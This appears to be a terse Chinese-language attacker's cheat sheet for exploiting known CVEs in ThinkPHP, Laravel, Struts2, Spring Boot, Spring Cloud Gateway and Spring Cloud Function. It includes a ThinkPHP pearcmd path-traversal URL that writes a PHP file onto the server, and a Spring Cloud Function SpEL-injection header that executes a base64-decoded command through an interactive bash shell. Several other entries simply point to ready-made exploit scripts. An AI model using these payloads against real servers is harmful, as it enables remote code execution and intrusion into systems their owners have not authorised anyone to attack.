THINKPHP-laravel-SpringBoot-Gateway-Struct2 CVE #
thinkphp #
thinkphp
在其6.0.13版本及以前
/?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php
写入文件
版本5.X命令执行 工具梭哈
Laravel #
CVE-2021-3129 RCE 工具 #
exp python
struct2框架 16年很多现在很少了 #
特点 index.action 这个action 工具梭哈因为漏洞很多
SpringBoot #
CVE-2022-22965 #
Spring core是Spring系列产品中用来负责发现、创建并处理bean之间的关系的一个工具包,是一个包含Spring框架基本的核心工具包,Spring其他组件都要使用到这个包。
CVE-2022-22965_Spring_Core_RCE-main> exp.py
CVE-2021-21234 目录遍历 #
Spring-boot-actuator-logview 0.2.13之前版本存在路径遍历漏洞,攻击者可通过该缺陷读取系统任意文件。 需要有这个组件才可以 而且要满足版本 不然不行
CVE-2022-22947 #
API网关Spring Cloud Gateway是Spring中的一个API网关。 Spring Cloud Gateway 3.1.x < 3.1.1 Spring Cloud Gateway 3.0.x < 3.0.7
两种工具直接梭哈
CVE-2022-22963 Spring Cloud Function Spel表达式注入 #
Spring Cloud Function提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像Amazon AWS Lambda这样的 FaaS(函数即服务,function as a service)平台。
3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
参考:https://developer.aliyun.com/article/1160011
POST:/functionRouter
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,xx}|{base64,-d}|{bash,-i}")
